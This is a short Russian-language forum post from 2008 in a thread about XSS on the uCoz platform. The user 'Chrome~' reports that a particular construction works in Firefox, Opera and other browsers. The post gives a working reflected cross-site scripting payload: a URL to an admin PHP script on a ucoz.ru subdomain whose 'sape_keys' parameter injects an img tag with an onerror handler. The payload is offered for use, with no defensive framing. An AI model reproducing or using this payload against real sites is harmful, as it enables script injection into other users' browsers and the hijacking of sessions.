Тема: Ucoz xss
Показать сообщение отдельно

  #18  
Старый 29.12.2008, 23:27
Chrome~
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
С нами: 9162683

Репутация: 175
По умолчанию

Для Mozilla Firefox, Opera и некоторых других браузеров успешно работает такая конструкция:

Код:
http://cat.ucoz.ru/admin/ghckh.php?sape_keys="><img src="a"onerror=alert("XSS")>

Последний раз редактировалось Chrome~; 30.12.2008 в 00:23..
 
Ответить с цитированием